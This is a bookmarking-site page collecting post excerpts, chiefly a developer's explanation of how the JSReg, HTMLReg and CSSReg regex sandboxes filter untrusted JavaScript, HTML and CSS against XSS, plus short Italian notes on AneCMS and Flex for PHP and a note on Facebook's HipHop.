Onto CSSReg! It didn’t exist nor did I think it was needed as I thought I could rely on the browser to ensure multiple CSS rules didn’t cross over from single CSS dom rules. I was wrong. It was proven by many talented researchers (mentioned in the thanks section) that it wasn’t possible to get the browsers to rewrite CSS safely. I had to write another regex sandbox. This time it wasn’t as tricky as first appeared. As long as I didn’t try to follow the madness of the specification again I should be able to produce some CSS that was safe from malicious code yet is useful enough to use.
First off I gathered a list of properties and identifiers, I removed crappy browser specific extensions yeah they are bad. ALL OF THEM. Then I used the same method of HTMLReg to match each part, the trickiest part this time was urls. There are so many ways to escape a css url in every browser, you h[…]
CSSReg
HTMLReg
JSReg
Security
javascript
php
xss
from google
I decided today to do a proper blog post to explain my reasons for creating regex sandboxes. I don’t often write a lot of words on this blog partly because I’m not very good a making long meaningful sentences and partly because I think the point can often be made in less words. Hopefully this will be useful for someone writing filters.
First off a quote “You can’t parse [X]HTML with regex. Because HTML can’t be parsed by regex. Regex is not a tool that can be used to correctly parse HTML” from (stackoverflow). I agree with the comment it isn’t possible to fully parse HTML with regexes but my goal wasn’t to do that, I wanted to parse a safe form of HTML. I also have a uncontrollable urge to do something that people say can’t be done.
Now we have that out of the way, how did this all begin? Well I was building a char by char JavaScript parser inside JavaScript to allow untrusted code to be executed. Every time I wrote a simple string matching function I found myself making shortcuts and using regexes instead. For example why loop through all characters when you can whitelist the desired ones? I soon found that I had a great advantage of using regexes instead of parsing every character, because I could use the native JavaScript engine to help me.
This lead me to develop JSReg [1], at first it seemed very easy to match JavaScript, the numbers were pretty easy and strings but I then encountered one of the first problems of regex sandboxes. It is very difficult to match something that is matching itself, for example an array can contain pretty much any JavaScript statement and itself but if you are defining it how can you match it? I didn’t really have an answer to this, one of my solutions to this problem was to create a recursive regex that created a second compiler to match inside the first match and so on. But this was slow and because JavaScript doesn’t have lookbehind previous matches would eat characters in the next match (I’ll talk more about this in the design). My other idea was to use backreferences but these are very difficult to track when using multiple regexes and they only return a successful match in my tests it wasn’t possible to produce a perfect array match using backreferences. I could be wrong of course I know I’m not perfect.
The design
My basis of my design was to not rely on 3rd party code were possible that means no jquery etc, in addition I should employ multiple layers of security wherever possible. These were good design decisions. Throughout initial testing the multiple layers proved difficult to break down. For JSReg the first layer was an iframe, the iframe was created each time of execution enabling fresh prototypes and a throw away box once execution had finished. Then I whitelisted the entire JavaScript objects/properties, this was done by forcing all methods to use suffix/prefix of “$”. Each variable assignment was then localized using var to force local variables. Each object was also checked to ensure it didn’t contain a window reference.
Javascript arrays proved tricky as mentioned earlier because of the amount of code that can be included within them, initially I decided to try and match them and their contents. But there were several performance problems of matching all that code and JavaScript regex limitations. For example I use one regex with a replace function to globally match each sequence using groups, the idea is to match all the valid objects first. In the instance of an array you’d first match all regex objects, strings etc because they can contain a “[" and "]” then once all valid objects have been enumerated by the regex engine it will encounter the first “[" of our array.
This works well in practice for every object apart from arrays. In JavaScript the array literal shares the same syntax as the object accessor. Therefore you have to identify the difference between an array or object. Sounds easy?
[][0[0,0[0]]];
+[][0[0,0[0]]];
{}['I am an array']
~{a:0}['I am a object accessor']
As you can see with the samples above, you’d have to match the entire js syntax before the opening “[". Then if you don't match the entire sequence inside the array you won't know if the ending "]” is part of an array sequence or object. This problem was unsolved for a long time. The main reason was in order to protect against window references I rewrite object accessors like obj['abc'] to obj[JSREG_FUNC.gp('abc')] so the function returns a safe string which uses the prefix/suffix of $ e.g. abc becomes $abc$. Because a string is returned of the expression it would break an array if it wasn’t detected.
Detecting an array or object was difficult because of the design too, you see if a regex object is matched like /abc/ and is followed by a object accessor like /abc/['source'] the previous expression is eaten by the parser so the next match is effectively ['source'] which JSReg understandably thinks is an array. A simple way round this would be to lookbehind to see if a whitelist of characters make the opening “[" an array or not. But JavaScript doesn't support lookbehinds!
The simple workaround was to use Array(1,2,3) instead for arrays and assume all "[" and "]” were not arrays. This worked but it breaks existing code. Finally after many attempts I think I’ve come up with a solution. I store a list of previous matches and rewrite all array literals and object accessors into a function or method. This means I no longer need to detect the ending of the array as they both have a “)” instead of a “]”. Easily demonstrated with a code example:-
[1,2,3] //becomes:-
A(Number(1),Number(2),Number(3))
window['x']//becomes:-
$window$.JSREG_PROP('x')
Finally as part of the design I check the JavaScript syntax before and after conversion this provides another layer of security if the rewrite fails at any part of matching the code.
The code
JavaScript is difficult to match but I found HTML/CSS easier. At first I started the code for HTMLReg [2] and CSSReg [3] in a similar way to JSReg. Then I realized when hacking my own code how I could make it better to defend against attack. First off I employed a strict whitelist to remove any partial open HTML attacks and evil attributes that were obvious attacks. This means I didn’t stick to the HTML specification, I don’t allow any junk in attributes. For example if you want to include “<" or ">” inside a title attribute then you have to encode it. I may allow them in future if it can be proven safe but I’d rather not fight something I can’t win. You may disagree with what I’ve just said but your filter is probably being pwnd right now.
Once I had my whitelist of tags and attributes I constructed RegExes for any individual parts I wanted to match. For example text nodes, invalid tags and valid attributes, these would be nicely chained together in one big regex. Then each part is grouped so that you can match each expression and validate it.
Here is how it works:-
html.replace(mainRegExp, function($0, $styleTag, $tag, $text, $invalidTags) {}
Notice how I use the replace function, I don’t do html = html.replace because I only want to match the text in my regexes. I prefer to use replace because I have a nice reference to each group like this automatically with local variables. This was a lesson I learned from developing JSReg as if the replace fails it will return your plain code rather than rewrite it.
Inside the function I include a couple of things in each block I’ll use the text node as an example:-
if($text !== undefined && $text.length) {
output += $text;
parseTree+='text('+$text+')\n';
}
Here if the text node is matched it adds it to the output. Parse tree is a nice way of keeping track of what you’ve matched. It’s a useful debugging reference. The if statement is required because of browser inconsistencies when matching groups.
In the case of HTMLReg for performance reasons I have a whitelist to match a general tag, then inspect it further so I’m only matching a smaller amount of text. You can see that with the following code:-
if($tag !== undefined && $tag.length) {
if(!new RegExp('^<\\\/?'+allowedTags.source+'[\\s>]','i').test($tag)) {
return '';
}
parseTree+='tag('+$tag+')\n';
if(!/^<\/?[a-z0-9]+>$/i.test($tag)) {
$tag = parseAttrValues($tag);
}
output += $tag;
}
Once my tag has been matched I then start to parse attributes, I do this by creating a hidden div and reading it’s contents. This is cool for a number of reasons, we can read what the browser reads and our code automatically gets formatted. Because we then use the DOM it means our entities will be decoded for us. While testing I found that JavaScript won’t be executed using innerHTML without certain tags or attributes, if I whitelist the tags and attributes then I can use the innerHTML safely without having to worry about execution. I have a backup plan if this fails, I could be more strict with certain attributes if it’s possible to execute code.
Onto CSSReg! It didn’t exist nor did I think it was needed as I thought I could rely on the browser to ensure multiple CSS rules didn’t cross over from single CSS dom rules. I was wrong. It was proven by many talented researchers (mentioned in the thanks section) that it wasn’t possible to get the browsers to rewrite CSS safely. I had to write another regex sandbox. This time it wasn’t as tricky as first appeared. As long as I didn’t try to follow the madness of the specification again I should be able to produce some CSS that was safe from malicious code yet is useful enough to use.
First off I gathered a list of properties and identifiers, I removed crappy browser specific extensions yeah they are bad. ALL OF THEM. Then I used the same method of HTMLReg to match each part, the trickiest part this time was urls. There are so many ways to escape a css url in every browser, you h[…]
may 2010 by hanicker
AneCMS
march 2010 by hanicker
Mi segnalano e volentieri pubblico...
AneCMS è un progetto nuovo, italo-svizzero... L'autore mi dice:
Per ora mi sono concentrato sullo sviluppo del core che ha ancora qualche problema ma ho iniziato a sviluppare qualche modulo di test, ad esempio un blog, un forum, una gallery, sono molto semplici per ora.
Sono stato accettato anche su opensourcecms, ho bisogno di molti aiuti, traduttori, programmatori e webdesigner, ma anche gente che ha idee.
Se volete dare una mano al progetto fatevi avanti!
Mi_segnalano
PHP
anecms
cms
from google
AneCMS è un progetto nuovo, italo-svizzero... L'autore mi dice:
Per ora mi sono concentrato sullo sviluppo del core che ha ancora qualche problema ma ho iniziato a sviluppare qualche modulo di test, ad esempio un blog, un forum, una gallery, sono molto semplici per ora.
Sono stato accettato anche su opensourcecms, ho bisogno di molti aiuti, traduttori, programmatori e webdesigner, ma anche gente che ha idee.
Se volete dare una mano al progetto fatevi avanti!
march 2010 by hanicker
Flex per sviluppatori PHP
march 2010 by hanicker
Posterello veloce per segnalarvi il bel lavoro di traduzione di ideogroup dell'articolo Flex for PHP developers.
Già che ci sono saluto la mamma che è un po' che non la vedo.
AIR_e_Flex
PHP
Programmazione
flex
from google
Già che ci sono saluto la mamma che è un po' che non la vedo.
march 2010 by hanicker
PHP runtime rewritten, by Facebook?
february 2010 by hanicker
Yes, its true. Facebook has completely rewritten the PHP runtime to make it faster and more efficient, and its completely open source. Named HipHop, its described as a source code transformer, changing PHP into optimized C++ which is then compiled using g++. Thus keeping the best aspects of PHP while taking advantage of the performance of C++. Using HipHop, the Facebook web server CPU usage has been decreased by about fifty percent! And who would have thought that this and many other cool advances in programming, started at a Hackathon.
misc_hacks
c++
efficient
facebook
g++
hack
hackathon
php
speed
from google
february 2010 by hanicker
related tags
AIR_e_Flex ⊕ anecms ⊕ articles ⊕ c++ ⊕ calendario_2011_pdf ⊕ calendario_pdf ⊕ calendario_vettoriale ⊕ clean_url ⊕ cms ⊕ CSSReg ⊕ ecommerce ⊕ efficient ⊕ facebook ⊕ flex ⊕ g++ ⊕ Grafica ⊕ hack ⊕ hackathon ⊕ hiphop ⊕ HTMLReg ⊕ javascript ⊕ JSReg ⊕ Marketing ⊕ misc_hacks ⊕ Mi_segnalano ⊕ OpenCart ⊕ php ⊖ Programmazione ⊕ Programming ⊕ Security ⊕ seo ⊕ speed ⊕ uri ⊕ url ⊕ xss ⊕Copy this bookmark: